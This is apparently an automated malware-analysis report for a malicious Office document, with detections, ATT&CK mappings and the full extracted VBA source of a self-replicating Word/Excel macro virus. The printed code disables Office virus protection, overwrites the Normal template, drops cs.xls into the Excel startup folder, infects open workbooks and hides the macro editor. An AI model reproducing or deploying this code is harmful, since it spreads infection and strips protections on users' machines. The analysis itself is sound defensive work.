MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious OLE document containing VBA macros. The macros attempt to establish persistence by copying themselves to the Excel startup directory as 'cs.xls' and also to the Normal template. This suggests the malware aims to execute malicious code whenever Microsoft Office applications are launched.
Heuristics 4
-
ClamAV: Doc.Trojan.Hopper-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hopper-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3149 bytes |
SHA-256: 0f25d872f34f98bcbe39a12981dc83e5535c7fff06c82f63ba2aa8a426ae8421 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hopper-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'MultiSys
Private RunFlag As Boolean
Private Sub Document_Close()
On Error Resume Next
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'MultiSys" Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
xlsObj = GetObject(, "Excel.Application"): Quit = 0
If xlsObj = "" Then Set xlApp = CreateObject("Excel.Application"): Quit = 1
If UCase(Dir(xlApp.Application.StartupPath + "\cs.xls")) <> UCase("CS.XLS") Then
xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\cs.xls"
xlApp.Workbooks("cs.xls").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
xlApp.Workbooks("cs.xls").Close SaveChanges:=True
End If
If Quit = 1 Then xlApp.Application.Quit
End If
If AD.Lines(1, 1) <> "'MultiSys" Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
End Sub
Sub ViewVBCode(): Stealth: End Sub
Sub ToolsMacro(): Stealth: End Sub
Sub FileTemplates(): Stealth: End Sub
Private Sub Stealth(): On Error Resume Next
ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
If UCase(Dir(Application.StartupPath + "\cs.xls")) <> "CS.XLS" And RunFlag <> True Then
RunFlag = True
Set WordObj = GetObject(, "Word.Application"): Quit = 0
If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'MultiSys" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
If Quit = 1 Then WordObj.Application.Quit
Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\cs.xls", FileFormat:=xlNormal, AddToMru:=False
Workbooks("cs.xls").Close SaveChanges:=True
End If
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'MultiSys" Then
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.